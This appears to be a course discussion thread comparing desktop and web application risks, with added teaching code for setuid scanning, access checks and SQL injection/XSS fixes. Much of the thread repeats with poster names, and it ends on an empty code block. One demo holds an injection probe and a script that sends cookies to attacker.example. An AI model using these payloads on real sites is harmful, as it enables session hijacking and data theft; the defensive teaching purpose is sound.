A common shared risk between web and desktop applications is access control flaws. Per SANS, the main reason for access control flaws is inadequate input validation. For example, both desktop and web apps that fail to validate data entry could experience issues should a user input malicious code or unsupported characters into the app’s fields. This could cause the application to crash, which could be used as an entry point for an attacker.
A risk specific to web applications, and not desktop applications, is cross-site scripting. Cross-site scripting occurs when an adversary injects malicious code into a web application. For example, cross-site scripting can be used to modify URLs so that when a user clicks, their information is redirected to the attacker. This can be used to capture session cookies, which would allow the attacker to hijack the session.
These types of risks are especially dangerous because, like you point out, they could be used as an entry point for an attacker to gain privileged access with the right skill set; exploiting a buffer overflow could lead to a threat actor launching system commands to hijack a process run by an administrator user, and then damage can grow exponentially from there depending on the network segmentation in effect, which could prevent pivoting.
Hello Antonio,
I totally agree with you that you are on point as regards the categorization of risks in your analysis, but you need to appreciate that because of the proliferation of web-based apps, vulnerabilities are the new attack vector. An attack on a web-based application may yield information that should not be available, browser spying, identity theft, theft of service or content, damage to corporate image or the application itself, and the dreaded denial of service.
Hello Matthew, very well said.
If I may add, cross-site scripting enables an attacker to execute malicious scripts in another user’s web browser. However, instead of attacking the victim directly, the attacker exploits a vulnerability in a website the victim visits and indirectly gets the website to deliver the malicious script.
Difference between web applications and desktop applications:
Desktop applications have traditionally been limited by the hardware on which they run. They must be developed and installed for a specific operating system and may have strict hardware requirements that must be met to ensure they function correctly. This hardware dependency and the legacy of mainframe terminal applications often limit the complexity of the user interface of desktop applications. Web applications are more reminiscent of the original mainframe applications or the later client-server model common to early desktop business applications. Users use a web browser (effectively a client-side replacement) to access the application and use the resources available on the Internet, including storage and CPU processing power.
Desktop applications are computer programs that do not require an Internet connection to work, and web applications do not require any installation and can run on your web browser.
It is also interesting to see how much flexibility trouble an organization would have with desktop vs. web applications. As you mentioned, desktop applications limit you to accessing the system via your local device, and you are as strong as your device is. However, for web applications, all you need is a good web connection, which gives you the flexibility of accessing from anywhere you want regardless of the device’s ability.
I agree with you that desktop applications are traditionally limited by the hardware they run on. Web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Web applications require instant networking, which leads to a higher level of risk than desktop applications.
Zijian,
Although web applications are located on a remote server, users can access the web applications from any device. We use web applications day to day such as Google Docs, messengers, and email services. A question we have to ask ourselves is, how do we know that the vendor has proper security protocols in place?
You ask a great question! Everyone can be penetrated; look at SolarWinds and how that exploit was leveraged. It is very difficult to truly know who to trust...
You make a good point about desktop applications being limited by the hardware on which they run. This, in combination with cheaper internet costs and a, for the most part, always-connected world, seems to be one of the driving factors for web-based applications to replace desktop applications entirely. Why develop an application specifically locked into one type of operating system when you can just as easily make it cross-platform? Seems expensive and time consuming, in my opinion.
Hello Zijian,
I agree with you that web applications do not need to be installed on the computer because they can run in the browser. However, I would have to disagree with the statement that “desktop applications are computer programs that do not require any Internet connection to work.” My reason is that the internet powers the device and not the desktop application. In the absence of the internet, the device is offline, making the desktop application inoperable.
Desktop applications require users to install the application on local devices, whereas you can simply run a web-based application in a browser. Therefore, the first risk related to web-based applications is that if something goes wrong with your Internet connection, you lose access. However, desktop applications also limit your flexibility, because you have to use the local device only to access the application. When you deal with web applications, you don’t need to worry about system requirements or update hassle. Web applications are more cost effective, but you can’t secure them as much as you could desktop applications.
SANS also explains that firewalls provide security to organizations’ applications, but there is a higher risk that companies deal with. Therefore, a defense-in-depth strategy is offered by the reading. If the application connects to the internet, “new attacks and vulnerabilities are being reported on almost daily basis”. Access control, buffer overflows, SQL injection, XSS injection, format strings, command injection, and race conditions are some of the risk factors for web applications.
On the other hand, for desktop applications, permissions and files such as logs, security data files, binaries and CGI files should be evaluated to analyze the risk. The file interrogation part of the reading explains it well: “setuid and setgid files on your system are potential security risk, and should be monitored closely.”
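The file interrogation step quoted above (finding setuid and setgid files and watching them for change) is simple to script. The following is an added example, not code from the SANS reading or from any post in this thread. It walks a directory tree, reports every regular file carrying either special bit, and diffs the result against an earlier scan so that a newly appeared setuid binary stands out; the demo tree it scans is constructed in a temporary directory, and the mode it sets there (4755) is just a stand-in for a real privileged binary.

```python
import os
import stat
import tempfile

SPECIAL_BITS = stat.S_ISUID | stat.S_ISGID


def classify(mode):
    """Return 'setuid', 'setgid', 'setuid+setgid' or '' for a raw st_mode value."""
    kinds = []
    if mode & stat.S_ISUID:
        kinds.append("setuid")
    if mode & stat.S_ISGID:
        kinds.append("setgid")
    return "+".join(kinds)


def find_special_bits(root):
    """Walk `root` and return (path, octal mode, kind) for every regular file
    with the setuid or setgid bit set. lstat is used so a symlink is reported
    by its own mode rather than its target's; unreadable entries are skipped."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & SPECIAL_BITS:
                hits.append((path, oct(stat.S_IMODE(st.st_mode)), classify(st.st_mode)))
    return sorted(hits)


def new_since_baseline(current, baseline):
    """Entries in `current` whose path is absent from a previously saved scan.
    A setuid binary that was not there at the last scan is the hunting lead."""
    known = {path for path, _mode, _kind in baseline}
    return [hit for hit in current if hit[0] not in known]


def demo():
    """Constructed demo tree: two files in a temp dir, one given mode 4755.
    Setting the setuid bit on a file you own needs no root privileges."""
    with tempfile.TemporaryDirectory() as root:
        ordinary = os.path.join(root, "ordinary")
        suspicious = os.path.join(root, "suspicious")
        for path in (ordinary, suspicious):
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\necho hi\n")
        os.chmod(ordinary, 0o755)
        os.chmod(suspicious, 0o4755)
        return find_special_bits(root)


if __name__ == "__main__":
    for path, mode, kind in demo():
        print(f"{kind:14} {mode} {path}")
```

Run it against `/` (as a user that can read the relevant directories) to take a baseline, save the tuples, and feed a later scan plus the saved list to `new_since_baseline`; on a real host the interesting output is the delta, not the full list, since a stock system legitimately ships dozens of setuid binaries.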
I like your proactive approach for monitoring desktop applications via setuid and setgid for malicious activity. This is an area I like to use to form my threat hunting hypotheses for potential known bad in a client’s environment. Applications unnecessarily modifying permissions or scheduling processes can be an indicator of malware. Nice post.
Miray,
I agree desktop applications should be evaluated to analyze risks. For instance, a risk within a desktop application could be improper authorization, such as with the least privilege approach. So many administrators who have this level of access take advantage. This can be a risk because you can gain access to a critical database or system exclusively.
Both desktop and web-based applications are vulnerable to injection-based attacks, for instance rootkits and bootkits for desktop apps, and SQL injection for web apps. What makes each type of application unique is the underlying frameworks, which present their own risks, i.e., scale of impact and code-specific vulnerabilities. Web-based apps have the potential to impact a large scope of users based upon one attack, whereas desktop app attacks can be a more isolated incident targeting a single domain or user.
Kelly,
SQL injection is a very serious risk. If a SQL injection attack is successful, it can result in confidential data being deleted, lost or stolen. However, other desktop application risks include insufficient logging and monitoring, components with known vulnerabilities (outdated software), poor code quality, and improper cryptography (weak keys).
Basically, desktop applications are installed on a single computer (laptop or desktop) to perform a specific task, while web applications usually use a client-server architecture and are used via a web browser on client computers; for that reason web applications are becoming widely popular. Desktop and web applications are each popular depending on the situation and network requirements, and both have the following common and different risks.
Both applications face many common types of risk, such as input validation, which allows an attacker to inject malicious code into an input field; the application can crash or provide an entry point for the attacker.
Generally, web applications face cross-site scripting (XSS) risk, but desktop applications do not, because XSS is launched by modifying web URLs, and desktop applications are secure from it as they are accessible from the local system only.
Web applications require internet connectivity, so they face more risk from all over the internet; desktop applications used on a local system face limited risk.
Desktop applications have total control from a single computer; web applications are open to a large number of computers, locations and users. Web-based applications are accessible from remote locations, so many risks are generated when data travels through cables, switches and routers from client to server: they face sniffing, hijacking and MITM attacks, but desktop applications are protected from these risks.
Hi Mohammed, I do agree that desktop applications have total control, as opposed to a web application being accessible from remote locations, and this does pose more of a risk given that packet sniffing can occur, since there is more room for human error when not accessing from a personal computer.
Great points. As you said, both applications face many types of risk, but it does seem web applications are more vulnerable with the number of scripting attacks and injections that can be performed. Localized applications face a number of attacks as well, but to me, they are more difficult to conduct.
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Some common and shared risks that web-based applications and desktop applications face are any bugs that could affect the performance of the application and/or security. Another example they face is any malicious software that can run on the backend when using a web application or a desktop application. The only difference is that desktop applications utilize the computer’s resources in terms of data storage on its hardware instead of an internet connection like a web-based application. This may be a better and more secure approach, as a web-based application has more chances of coming across or being targeted because it is on a network that a hacker can break through, whereas a desktop application can run without an internet connection; it only needs the computer itself.
You are definitely right with “malicious software that can run on the backend when using both applications”. To me, a common/shared risk will be human error. If, for example, a phase was neglected or mistaken, then it will have a huge impact on the system. Great point!
Good point. Web apps are opening themselves up to internet-based attacks, and could be more vulnerable to brute force attacks, DDoS, and SQL injections.
There are a number of risks associated with web applications, such as buffer overflows and SQL injections. Whereas with desktop applications viruses and malware are the most common; that’s not to say they don’t exist with web applications, but they are more common in desktop applications. Other desktop application security risks include poor logging and monitoring, OS command injection, and hardcoded data values. Authentication seems to be the most common risk between the two. Poorly implemented session management systems can allow threat actors to take over accounts.
I like how you highlighted that different types of code injection affect web applications and desktop applications in different ways (e.g., SQL vs. OS-based). It is also important that you mentioned authentication vulnerabilities, because broken access control vulnerabilities have become the most common vector of cyber attack, and I believe this would fall under the category of authentication vulnerabilities.
Common risks for desktop applications are malware, viruses, worms, etc., and web-based application risks are injection attacks, broken access control, authentication, and security misconfiguration. Although the web application is more recent than the desktop app, they’re no less important. Web apps are accessible from any device, anywhere, at any time, and are exposed to more security risks than desktop apps and require more security needs, for example, internet access, users who are not identifiable, and cyber-attacks.
Segmenting your network is also a good way for secure coding to avoid all those issues. Humans are the ones behind the malware or viruses through misconfiguration, like you mentioned in your comment, so going through a checklist is time consuming but a good way to make sure you did not miss anything.
A shared risk between web applications and desktop applications is a buffer overflow attack. This is when an application does not perform adequate size checking on the input data, therefore leading to memory space being overwritten. A risk that is unique to a web-based application is an XML injection attack. This is because this attack is carried out through the XML of a web service. A risk that is unique to desktop applications is malware, due to the applications being installed locally. It leaves the user susceptible to malicious code being run and installed on their system.
Good examples of risks for both web-based and desktop applications. In addition to the security concern, there’s also an availability concern. Web apps also have more points of failure in terms of service speed, considering they’re reliant on the server speed and internet connection, whereas desktop apps just rely on your local hardware.
The common risks faced by desktop applications versus web-based applications are human error. SANS talks about how improper application design can cause access control issues. It also mentions inadequate input validation. All those are related to human error, and if one phase was neglected during the application development process, then this can give access to unauthorized users. For example, SANS talked about the vulnerability of SQL injection, in which the attacker is able to modify, delete, or insert data. This is due to improper data validation. Another common risk can be malicious software or a user inputting malicious code.
The difference between a web and a desktop application is that desktop apps are computer programs that do not need an internet connection to be used, while a web application needs an internet connection if you want to use it. Web applications are accessible over the Web and the HTTP protocol, so they present more security challenges than desktop applications. Misconfiguring a web application brings malicious attacks or provides bad actors with an easy way to exploit sensitive information, like the SQL injection SANS referred to.
Hi Ornella. Human error seems to always be a given when it comes to risks, whether it be desktop and/or web-based applications. I like the example you brought up from SANS in regards to the injection attack where the attacker had access to change data. It is unfortunate that human error continues to be an issue in security data breaches. Even though it is something that we cannot fully avoid, proper steps should always be taken in order to minimize the effect the next time it occurs.
What are the common/shared risks and what are the different/unique risks faced by desktop applications vs web-based applications?
A web application is software stored on a remote server and run in a web browser. A desktop application is stand-alone software that is installed on a computer. There are a number of risks that could occur on both a web-based application and a desktop application. Easy access can be gained to both desktop and web applications. Users can access web applications from any device. Desktop application security risks could be insecure communication or improper authorization, such as with the least privilege approach. Web application risks include injection flaws, broken authentication, SQL injection, and security misconfiguration.
However, organizations’ applications are at a higher risk although firewalls are providing security, according to SANS.
I like your post, and I would like to add that people are relying so much on firewalls providing security. However, they don’t put enough emphasis on how to properly secure their systems. Firewalls are great, but all means of security to avoid breaches are better. For that you should train your users on the do’s and don’ts of the company. Segment your network; physical security is also necessary to block unauthorized people from accessing your building or data server. Great post!
Web applications have a slight advantage over desktop applications, but desktop applications are very unlikely to become obsolete. Web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Updating an application takes a lot of time and effort for desktop applications because it needs to be done on each computer, but web-based applications save time and effort. Web applications face more security risks than desktop applications, and they are open to a large number of users in the Internet community, which expands the threat. Web application development and its maintenance involve higher costs; desktop applications are one-time purchases that do not incur continuous costs. Lack of funding for maintenance can easily prevent teams from following up and maintaining the system in a timely manner, thus creating a new risk.
Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes. One thing all business owners will have to acknowledge and guard themselves against would be the presence of software vulnerabilities and threats to web applications.
A web application is primarily software kept on a remote server and run in a web browser. A desktop application is simply stand-alone software that is installed on a computer. There are several risks that could happen on both a web-based application and a desktop application. Easy access can be obtained to both desktop and web applications. Users can therefore access web applications from any device at all. As a matter of fact, desktop application security risks could be not having strong communication or improper authorization, such as with the least privilege approach. Web application risks include injection flaws, broken authentication, SQL injection, and security misconfiguration. Organizations’ applications are deemed to be at a higher risk even though firewalls are providing security.
It is true that web applications can be more difficult to manage due to the larger attack surface. And you are certainly correct that the easy access makes web applications potentially more enticing for companies to develop. The decision needs to be made whether the ubiquity is worth the increased security risk.
Hello Kofi, I agree with your position that “Despite their convenience, there are drawbacks when it comes to relying on web applications for business processes.” Access to the internet only creates more vulnerabilities to be compromised by adversaries on the web. However, the onus is on the process owners to ensure that adequate controls are in place to mitigate any attacks that may arise from internet-related activities. Well said.
Both web-based and desktop applications are susceptible to traditional attacks through access control, and to injection attacks if neither program has input validation, allowing hackers to exploit syntax errors in either program. Where the two differ from each other is convenience, and the scope of the security varies between vendors. Web applications also introduce more exploits, such as buffer overflow, XML injection, and SQL injection attacks. And although web-based applications are cross-platform and provide a very easy and convenient way for the end user to access the application, it should be noted that platform security is dependent on the vendor that manages the application. Technically, desktop applications can come with similar risks depending on the scope of the system, since developers sometimes utilize embedded SQL servers within desktop applications depending on the system, but many desktop applications do not require an internet connection, which means access is local rather than over the web.
Web-based applications are programs you access online, delivered to your device from a remote server when you access them via a browser; they are not installed on your machine. On the other hand, desktop applications are the programs that you download and install on your device. They do not need internet connectivity to be used. Every required functionality is stored on the workstation, with little or no reference to the internet except for connectivity. So, the application can be accessed through your desktop.
The common risk they both face is XSS (cross-site scripting) and other malicious attacks that may compromise access to the application.
Web-based applications are the more modern method of delivering applications, while desktop applications are more traditional.
Web applications are at higher security risk as they are inherently designed to increase accessibility. On the other hand, desktop applications have better authorization, and administrators have better control, hence they are more secure. In addition, web applications rely heavily on internet connectivity for their operation, while desktop applications rely solely on user access.
Everything on the internet is more vulnerable to hackers than information left on a device; cloud storage, for example, is deployed either in the form of SaaS, IaaS or PaaS by the cloud service provider (CSP) without client input. In contrast, desktop storage is solely reliant on the capability of the data owner and not the service provider.
• What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Cross-site scripting and SQL injection attacks are common risks in both desktop and web-based apps. The two applications differ in their construct (browser-based vs. executing 100% on your local compute platform), but share the vulnerabilities of connecting to and querying back-end systems.
The different vulnerabilities come from the different locations where functions are executed in desktop vs. web-based apps. Desktop apps are also vulnerable to a host of attacks that can be launched from the local compute platform. Web-based apps tend to be browser-based and are more vulnerable to web server-based attacks.
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
The most obvious shared risk between desktop and web-based applications is that of access control flaws. Although it is a more general issue with different implications based on the type of access flaw, it is prevalent and poses a significant risk in both types of applications on a large scale. SQL Injection and XSS are primary risks that even make it to the OWASP top 10 list of common web app vulnerabilities. On the other hand, desktop applications are quite susceptible to process hijacking and then privilege escalation or pivoting.
Thanks for sharing; the OWASP list is a good piece of information. SQL is definitely a serious risk for web-based apps.
Do you happen to have any examples of a desktop application being hijacked?
Desktop and web-based applications are subject to both authentication and access control risks, since both need to be configured to ensure only appropriate users maintain access to the application and each can only perform the functions they are required to perform. Some of the more common desktop application risks include malware/viruses, which can be developed to take advantage of a flaw in the design/configuration of the application and can be propagated across other clients in the network. Web-based applications are typically more vulnerable to remote attacks, such as cross-site scripting (XSS) and SQL injection.
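The access control point made in this post, and in several earlier ones in the thread (an application that authenticates a user but never checks what that user is allowed to touch), is easiest to see in code. The following is an added example written for this page, not code from any poster or from SANS. The document store, the users and the role grants are all constructed; the shape of the bug is the same whether the caller is a browser hitting a web endpoint or a desktop client talking to a local database. Note that the "vulnerable" function ignores its `user` argument entirely, and that the safe version denies by default and returns one error for both "missing" and "forbidden" so ids cannot be enumerated.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    roles: frozenset


@dataclass(frozen=True)
class Document:
    doc_id: int
    owner: str
    body: str


# Constructed data: two users' private documents in an in-memory "store".
DOCUMENTS = {
    1: Document(1, "alice", "alice's notes"),
    2: Document(2, "bob", "bob's notes"),
}

# Roles that may perform an action on a document they do NOT own.
# Anything not listed here is denied: deny by default is the least-privilege posture.
ROLE_GRANTS = {
    "read": frozenset({"auditor", "admin"}),
    "delete": frozenset({"admin"}),
}


class Forbidden(Exception):
    pass


def fetch_document_vulnerable(user, doc_id):
    """Authenticated but not authorized: any logged-in user can fetch any id
    (an insecure direct object reference). `user` is never consulted."""
    return DOCUMENTS[doc_id]


def is_authorized(user, action, doc):
    """The owner may do anything to their own document; otherwise the action
    must be explicitly granted to one of the user's roles."""
    if doc.owner == user.name:
        return True
    return bool(user.roles & ROLE_GRANTS.get(action, frozenset()))


def fetch_document_safe(user, doc_id):
    """Authorization check on every access, with a single error for both
    'missing' and 'forbidden' so a caller cannot probe which ids exist."""
    doc = DOCUMENTS.get(doc_id)
    if doc is None or not is_authorized(user, "read", doc):
        raise Forbidden(f"{user.name} may not read document {doc_id}")
    return doc


def can(user, action, doc_id):
    """Boolean form of the same check, for tests and for gating UI elements."""
    doc = DOCUMENTS.get(doc_id)
    return doc is not None and is_authorized(user, action, doc)


# Constructed principals used by the demo and the tests.
ALICE = User("alice", frozenset())
BOB = User("bob", frozenset())
AUDITOR = User("carol", frozenset({"auditor"}))
ADMIN = User("dave", frozenset({"admin"}))


if __name__ == "__main__":
    print(fetch_document_vulnerable(BOB, 1).body)  # bob reads alice's notes
    try:
        fetch_document_safe(BOB, 1)
    except Forbidden as exc:
        print("blocked:", exc)
```

The check lives in one function (`is_authorized`) that every data-access path calls, rather than being sprinkled per endpoint; that is what makes the "each user can only perform the functions they are required to perform" requirement auditable, and it is the part that tends to be missing when a test suite only covers the happy path.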
Hello Bryan,
That’s a good explanation of the difference between web and desktop applications. I do agree that web applications are vulnerable to cross-site scripting (XSS) and SQL injection. However, malware and viruses are also a risk to web applications as well as desktop applications.
Hi Bryan. Great analysis! I would also argue that SQL injection could impact on-prem applications if the SQL database connects with any web server-based databases (same with XML attacks).
The common risk that both desktop applications and web-based applications have is maintaining the application itself. If the application is not patched on time, then it would be vulnerable to the vulnerabilities that the current version might have. The risk that desktop applications have is that they are limited by the hardware resources. If the resources of the system the application is installed on do not meet the performance level accepted by the business, then it might need to be replaced. Another risk with desktop applications is that they need to be installed on the desktop by the user. If the application installed by the user has malware in it, then it could introduce risk within the company’s network. The risk with web-based applications is that the user has to have a good internet connection. They also need to be properly configured, as they could be accessible by anyone on the internet.
Fantastic post; you did a far better job than me explaining the ease with which an attacker can execute a web-based attack by simply having an internet connection. I agree that desktop apps require an additional level of privilege escalation in order to cause considerable damage.
Both desktop applications and web-based applications are vulnerable to many application-based risks. Web-based applications are highly privy to buffer overflow attacks, which can lead to DDoS (distributed denial of service) attacks or even malware injections. Due to the on-prem nature of desktop applications (i.e., calculator), this attack can generally be avoided; but when a desktop application connects with web-based servers, the possibility of a buffer overflow attack resurfaces. SQL injection can impact both desktop and web-based applications; the internet is not always required to use MySQL (or other SQL programs, for example), so an attacker can commit a SQL injection on either type of application. A unique risk experienced by web-based applications, however, is XML injection attacks. XML is the exclusive metalanguage used by the internet and is the backbone of web servers. If an XML injection attack were to be successful, this can compromise an entire web-based application or even a web-based database; this would not have the same impacts on a desktop server though.
I actually didn’t think about XML when I was making my comment. I wish I had stated that instead of the other points I made. Anyhow, I like that you pointed out that SQL is sometimes used by desktop applications. I know a lot of developers will embed SQL into applications to function as servers for a LAN.
What are the common/shared risks and what are the different/unique risks faced by desktop applications versus web-based applications?
Both desktop applications and web-based applications have the challenge of being maintained, the risk of unwanted access, and security risks.
Some differences are:
Web-based: no need to install, not user dependent for updates, easy access, can be accessed from a mobile device, more security risks due to internet exposure.
Application-based: does not rely on the internet, stronger privacy and data protection due to not being internet dependent, more hardware dependent as it needs computer resources to run but usually runs faster than web-based because of this, unable to be accessed from as many devices as web-based.
Desktop application cons
* Desktop apps may be harder to scale when compared to cloud-based alternatives
* There is a lack of communication between computers. Changes you made locally may not reflect on another user’s machine. Meaning collaboration is also more difficult on desktop apps. Users may share files via email or USB, creating a potential security vulnerability.
Web app cons
* You must be connected to the internet, leaving you vulnerable to internet-based attacks. Whereas with desktop apps, you have the opportunity to air gap
* Availability is limited to the service availability. For example, if AWS has an outage, there’s not much you personally can do to get it back up and running
* There are more potential points of failure. Desktop apps only rely on your computer speed, whereas web apps can be affected by server speed and internet speed.
* For desktop apps, you have the opportunity to pursue your own backup solution. However, with web apps you may be forced to use a certain backup solution that’s compatible or supported by that web app.
* For desktop apps, there is no question of ownership. The person on that local computer made that change in the app. However, web app data is not stored locally, but sent to a cloud, so there may be a question of ownership regarding changes or updates to the data.
* Web apps may have an automatic update system in place, which could potentially break compatibility or functionality.
Risks for both
* Security updates are a concern, since not all applications will be supported indefinitely; most applications will hit end of life.
Desktop applications & web-based applications have several shared risks, such as poor authentication measures and weak passwords. Regardless of how the application is accessed, weak passwords can be broken if the data is highly desired, and so back-up measures such as two-factor authentication should always be in place. A unique risk that desktop applications face is their high vulnerability to malware invading the system the application is installed on. If a person downloads an untrustworthy application, they may be allowing something onto their computer that can quickly spread across the system & network. Another risk is the application being locked onto a particular device. For example, if you leave work for the day and forget to lock your computer, you are openly leaving all of the information on a specific desktop application open to whoever. On the other hand, web-based applications have their own unique risks, such as SQL Injection & Cross-site scripting. SQL Injection works when an attacker includes SQL query into an input channel on an application that the user then accesses. Once the malicious SQL query is validated, the attacker is able to access/manipulate database information, such as sensitive company data. Cross-site scripting (XSS) works by exploiting an application with a client-side text string containing malicious JavaScript to a user’s browser, which can have several consequences such as redirecting the user to a malicious website or stealing sensitive cookie information.
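The two mechanisms described in the post above, a SQL query smuggled through an input field and a script string reflected into a page to steal cookies, can both be reproduced and fixed in a few lines. The following is an added example written for this page; it is not code from the post, from SANS, or from any real application. The user table is a constructed in-memory SQLite database, the SQL injection probe and the cookie-stealing script are constructed attacker inputs, and `attacker.example` is a placeholder host. Each vulnerable function sits next to the version that closes the hole: parameterised queries for the database, output escaping for the page.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory database standing in for an application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-alice", 1), ("bob", "hash-bob", 0)],
    )
    return conn


def lookup_vulnerable(conn, username):
    """String concatenation: the input is parsed as part of the SQL statement,
    so a quote character in it rewrites the WHERE clause."""
    sql = "SELECT username, is_admin FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameterised query: the driver passes the value separately from the
    statement text, so it is compared as data and cannot alter the query."""
    sql = "SELECT username, is_admin FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# The classic tautology probe; constructed here as the attacker's form input.
SQLI_PAYLOAD = "' OR '1'='1"

# Constructed XSS payload: loads an image from the attacker's host with the
# victim's cookies in the query string, which is how a session gets hijacked.
XSS_PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"


def render_comment_vulnerable(text):
    """Reflects user-supplied text straight into the HTML."""
    return '<p class="comment">' + text + '</p>'


def render_comment_safe(text):
    """Escapes on output, so the browser displays the payload as text instead
    of executing it. Marking the session cookie HttpOnly is the second line
    of defence: even a successful script then cannot read document.cookie."""
    return '<p class="comment">' + html.escape(text, quote=True) + '</p>'


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, SQLI_PAYLOAD))  # every user row comes back
    print(lookup_safe(conn, SQLI_PAYLOAD))        # []: no user has that literal name
    print(render_comment_safe(XSS_PAYLOAD))
```

With the probe as input, the concatenated statement becomes `WHERE username = '' OR '1'='1'`, which is true for every row; the parameterised version looks for a user literally named `' OR '1'='1` and finds none. The same separation of code from data is the fix on the browser side: escaping turns `<script>` into `&lt;script&gt;`, which the HTML parser never treats as a tag.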
People are the shared risk that both desktop apps and web apps have in common. Because of people, web apps and desktop apps are at risk due to being connected to the internet. Authentication, authorization, exposure of sensitive data and injections are all risks that come with being connected to the internet. Web applications are more at risk than desktop apps in today’s world. Web applications face risks such as login/password theft, security misconfiguration and cross-site scripting. Desktops do have risks such as viruses and malware but are less risky because they do not require the internet to run.
I hadn’t considered human risk even though we have discussed various ways humans introduce IT security risk across several units. It’s a great point and I think with the existence and popularity of cloud based services humans are much more vulnerable to web application rather than desktop application risks.
A desktop application is a type of software that you install directly on your personal computer. You can launch it whenever you want, independently of other applications. They take up space on your hard drive and can work regardless of internet connection. Although some apps need it to function as intended (web browsers like Chrome or Firefox, for example), they are still considered desktop apps since they are installed on your PC, whereas a web-based application is a type of software application that is used through the internet via a web browser. Instead of storing the files on your computer, they are located on a remote server. A web browser allows you to access the app and its content and also runs all the scripts responsible for its features. What differentiates a simple static web page from a web application is interactivity. They often allow you to create, edit, or manipulate data and content.
Matthew Bryan says
A common shared risk between web and desktop applications is access control flaws. Per SANS, the main reason for access control flaws is inadequate input validation. For example, both desktop and web apps that fail to validate data entry could experience issues should a user input malicious code or unsupported characters into the app’s fields. This could cause the application to crash, which could be used as an entry point for an attacker.
A risk specific to web applications, and not desktop applications, is cross-site scripting. Cross-site scripting occurs when an adversary injects malicious code into a web application. For example, cross-site scripting can be used to modify URLs so that when a user clicks, their information is redirected to the attacker. This can be used to capture session cookies, which would allow the attacker to hijack the session.
Antonio Cozza says
These types of risks are especially dangerous because, like you point out, they could be used as an entry point for an attacker to gain privileged access with the right skill set; exploiting a buffer overflow could lead to a threat actor launching system commands to hijack a process run by an administrator user, and then damage can exponentiate from there based on the network segmentation in effect, which could prevent against pivoting.
kofi bonsu says
Hello Antonio,
I totally agree with you that you are on point as regards the categorization of risks in your analysis, but you need to appreciate that because of the proliferation of Web-based apps, vulnerabilities are the new attack vector. An attack on a Web-based application may yield information that should not be available, browser spying, identity theft, theft of service or content, damage to corporate image or the application itself and the dreaded Denial of Service.
Olayinka Lucas says
Hello Matthew, Very well said.
If I may add, Cross-Site scripting enables an attacker to execute malicious scripts in another user’s web browser. However, instead of attacking the victim directly, the attacker exploits a vulnerability in a website the victim visits and indirectly gets the website to deliver the malicious script.
zijian ou says
Differences between Web applications and desktop applications:
Desktop applications have traditionally been limited by the hardware on which they run. They must be developed and installed for a specific operating system and may have strict hardware requirements that must be met to ensure they function correctly. This hardware dependency and the legacy of mainframe terminal applications often limit the complexity of the user interface of desktop applications. Web applications are more reminiscent of the original mainframe applications or the later client-server model common to early desktop business applications. Users use a Web browser (effectively a client-side replacement) to access the application and use the resources available on the Internet, including storage and CPU processing power.
Desktop applications are computer programs that do not require an Internet connection to work, and web applications do not require any installation and can run on your web browser.
Miray Bolukbasi says
Hi Zijian,
It is also interesting to see how much flexibility trouble an organization would have with desktop vs. web applications. As you mentioned, desktop applications limit you to accessing the system via your local device, and you are only as strong as your device is. However, for web applications, all you need to have is a good web connection, which gives you the flexibility of accessing from anywhere you want regardless of the device’s ability.
Dan Xu says
Hi zijian,
I agree with you that desktop applications are traditionally limited by the hardware they run on. Web applications only need to be opened, whereas desktop applications need to be installed separately on each computer. Web applications require instant networking, which leads to a higher level of risk than desktop applications.
Victoria Zak says
Zijian,
Although web applications are located on a remote server, users can access the web applications from any device. We use web applications day to day such as Google Docs, messengers, and email services. A question we have to ask ourselves is, how do we know that the vendor has proper security protocols in place?
Richard Hertz says
You ask a great question! Everyone can be penetrated – look at Solar Winds and how that exploit was leveraged. It is very difficult to truly know who to trust……
zijian ou says
I like your question. Nowadays, many people question whether the network devices and software we use in our lives are secure and confidential or not.
Alexander William Knoll says
Zijian,
You make a good point about desktop applications being limited by the hardware on which they run. This, in combination with cheaper internet costs and a, for the most part, always connected world, seems to be one of the driving factors for web-based applications to replace desktop applications entirely. Why develop an application specifically locked into one type of operating system, when you can just as easily make it cross-platform? Seems expensive & time consuming, in my opinion.
Olayinka Lucas says
Hello Zijian,
I agree with you that web applications do not need to be installed on the computer because they can run on the browser. However, I would have to disagree with the statement that “desktop applications are computer programs that do not require any Internet connection to work.” My reason is that the internet powers the device and not the desktop application. In the absence of the internet, the device is offline, making the desktop application inoperable.
Miray Bolukbasi says
Desktop applications require the user to install the application on local devices, whereas you can simply run your web-based application in a browser. Therefore, the first risk related to web-based applications is that if something goes wrong with your Internet connection, you lose access. However, desktop applications also limit your flexibility, because you have to use the local device only to access the application. When you deal with web applications, you don’t need to worry about system requirements or the update hassle. Web applications are the most cost-effective, but you can’t secure them as much as you could desktop applications.
SANS also explains that firewalls are providing security to organizations’ applications, but there is a higher risk that the company deals with. Therefore, an in-depth defense strategy is offered by the reading. If the application connects to the internet, “new attacks and vulnerabilities are being reported on almost daily basis”. Access control, buffer overflows, SQL injection, XSS injection, format strings, command injection, and race conditions are some of the risk factors for web applications.
On the other side, for desktop applications, permissions and files such as logs, security data files, binaries and cgi files should be evaluated to analyze the risk. The file interrogation part of the reading explains well that for an organization: “setuid and setgid files on your system are potential security risk, and should be monitored closely.”
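The file-interrogation point above, turned into a small monitoring job: inventory the setuid/setgid files under a directory tree and diff the result against a known-good baseline so that newly privileged binaries stand out. This is an added example, not code from the SANS reading or the post; the one-path-per-line baseline format and the constructed temporary files are assumptions.

```python
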